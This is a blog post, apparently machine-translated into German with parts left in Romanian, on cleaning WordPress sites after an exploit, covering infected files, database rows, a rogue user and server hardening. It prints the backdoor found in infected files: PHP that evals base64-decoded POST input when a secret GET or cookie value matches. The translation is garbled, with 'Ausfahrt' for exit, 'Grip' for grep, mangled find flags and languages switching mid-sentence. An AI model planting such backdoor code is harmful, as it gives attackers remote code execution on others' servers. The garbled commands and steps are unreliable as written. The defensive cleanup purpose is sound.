Bevor Sie diesen Beitrag lesen, müssen Sie sehen Der Beitrag hieretwas zu verstehen. :)
Ich fand in mehreren Dateien von Blogs auf Stealthsetts.com, Codes ähnlich wie unten, die als Ergebnis von Virus mit erschienen Exploitul de WordPress.:
<Php if ($ _ GET ['573ABCB060974771'] ==”8E96D1B4B674E1D2″) {eval (Base64_Decode ($ _ post ['file'])); Ausfahrt; }?>
und
<Php if ($ _ cookie [’44e827f9fbeca184′] ==”5CD3C94B4B1C57EA”) {eval (Base64_Decode ($ _ post ['file'])); Ausfahrt; }?>
Im obigen Fall geht es um die Datei xmlrpc.php der Schläfrig, aber bei a Grep Auf dem Server können Sie sehen, dass es in Quellen ziemlich viele Codes dieser Art gibt.
Reinigung infizierter Dateien:
Ooookkkkkyouak
1. Die beste Lösung, nachdem sie fertig ist Backup-ul si curatata baza de date, este sa LÖSCHEN fisierele de WordPress (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.
Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.
./andreea/wp-content/themes/default/index.php:<Php if ($ _ cookie [’44e827f9fbeca184′] ==”5CD3C94B4B1C57EA”) {eval (Base64_Decode ($ _ post ['file'])); Ausfahrt; }?><?php get_header(); ?>
2. Cautati si stergeti toate fisierele care contin : *_new.php, *_old.php, *.jpgg, *.giff, *.pngg si fisierul wp-info.txt, daca exista.
find . -name “*_new.php”
find . -name “*_old.php”
find . -name “*.Jpgg”
find . -name “* _giff”
find . -name “*_pngg”
find . -name “wp-info.txt”
3.. In /tmp Suchen und löschen Ordner wie tmpywbzt2
SQL -Reinigung :
1. In der Tabelle Tabelle wp_options Sehen Sie, ob Sie existieren, und löschen Sie die Zeilen: interne_links_cacheAnwesend RIS_F541B3ABD05E7962FCAB37737F40FAD8 und WordPress_Options.
2. Auch in WP_Options, gehen Sie zu Active_plugins Und löschen Sie, wenn es vorhanden ist, ein Plugin, das in einer der Erweiterungen endet
3. im Tisch WP_USERS, Sehen Sie, ob es einen Benutzer gibt, der neben ihm nichts zu schreiben hat, in der Spalte User_nicename. Löschen Sie diesen Benutzer, behalten Sie jedoch die Nummer in der Spalte ID. Dieser Benutzer kann "WordPress" als verwenden user_login Und es scheint am 00:00 0000-00-00 erstellt zu werden.
4. Gehen Sie zum Tisch WP_USUMETA und löschen Sie alle Zeilen, die zur ID oben gehören.
Nachdem Sie diese Reinigung von SQL durchgeführt haben, deaktivieren Sie und dann ein Plugin aktivieren. (im Blog -> Armaturenbrett -> Plugins)
Server -Erbringung:
1. Sehen Sie, welche Verzeichnisse und Dateien sind “Beschreibbar"(CHMOD 777) und versuchen Chmod Dies erlaubt ihnen nicht mehr, aus irgendeiner Ebene zu schreiben. (Zum Beispiel CHMOD 644)
finden . -Perm -2 –ls
2. Sehen Sie, welche Dateien das Bit festgelegt haben Süden oder Schlittschuh . Wenn Sie diese Dateien nicht verwenden, stellen Sie sie auf Chmod 0 oder deinstallieren das Paket, das enthält. Sie sind sehr gefährlich, weil sie mit den Privilegien auftreten. “Gruppe"Oder"Wurzel"Und nicht mit den Berechtigungen des normalen Benutzer, der diese Datei ausführt.
Finden Sie / -typ f -perm -04000 -ls
Finden Sie / -typ f -perm -02000 -ls
3. Überprüfen Sie, welche Ports offen sind, und versuchen Sie, diejenigen zu schließen oder zu sichern, die nicht verwendet werden.
Netstat -an | Grip -i -Liste
Das war's. Ich sehe das Einige Blogs sind banal Von Google Search und anderen sagen "Nun, tat sie !!!" . Nun, sie hätten sie getan ... aber was sagst du, wenn Google anfängt, Geld zu Geld alle Standorte wer macht es SE Spam und Trojaner (Trojan.Clicker.html) in Keksen?
1 nachdacht “WordPress Exploit – Reinigung von Virusdateien, SQL und Serversicherheit.”